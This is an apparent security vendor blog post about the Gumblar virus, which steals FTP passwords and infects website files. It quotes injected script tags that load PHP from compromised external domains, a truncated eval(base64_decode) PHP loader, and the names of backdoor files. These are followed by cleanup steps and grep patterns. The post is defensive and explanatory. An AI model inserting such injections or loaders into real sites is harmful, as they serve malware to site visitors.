If you have a web site and you want it to be secure, the first place you have protect is your desktop.
Recently (well, since 2009), a large number of sites have been infected with malware and blacklisted due to a few desktop virus (generally called Gumblar, port 8080, etc). These virus steals your FTP password and does the following things:
Infects all .js files on your site with entries like this one:
document.write( <script src="http://wap.northernplumbingandheating.com/assets/postinfo.php document.write( <script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php
It infects every .html files with entries similar to this:
script src="http://wap.northernplumbingandheating.com/assets/postinfo.php" script src="http://shopping-dubai.com/images/runActiveContent.php" script src="http://stb-umhau.de/images/muffin35.php" script src="http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php"
Every PHP file with a code similar to this one:
eval( base64_decode(" aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEd MT0JBTF..
It also creates backdoor files called gifimg.php on multiple directories
Note that the domain changes every time and this is just a small list of them:
http://stb-umhau.de/images/muffin35.php http://shopping-dubai.com/images/runActiveContent.php http://wap.northernplumbingandheating.com http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php http://applebe.dothome.co.kr/bbs/fla-3.php
How to clean my desktop if I have this virus?
- Install an anti-virus and make sure it detected and removed the problem. If it didn’t, try a different one 🙂
- Change your FTP passwords.
- Start using SFTP instead of FTP
- Do not store your FTP/SFTP password on your desktop
How to clean my site if it is infected?
You can hire us to clean it up for you and monitor your sites going forward:Malware Removal
Or if you prefer to do yourself:
- Scan your site to see where the malware is and how it is called on your site
- Download your whole site to your desktop
- Use grep (or wingrep) and search for src=http, eval(base64_decode(“aW
- Remove all those entries as well as the gifimg.php backdoors
- Re-upload your site back
That should clean up your site. Note that it only applies to this type of virus (Gumblar or MW:JS:150), so if you have a different one, this clean up solution may not work completely.
If your site is hacked (or contains malware), and you need help, send us an email at firstname.lastname@example.org or visit our site: Sucuri Security. We can get your sites clean up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.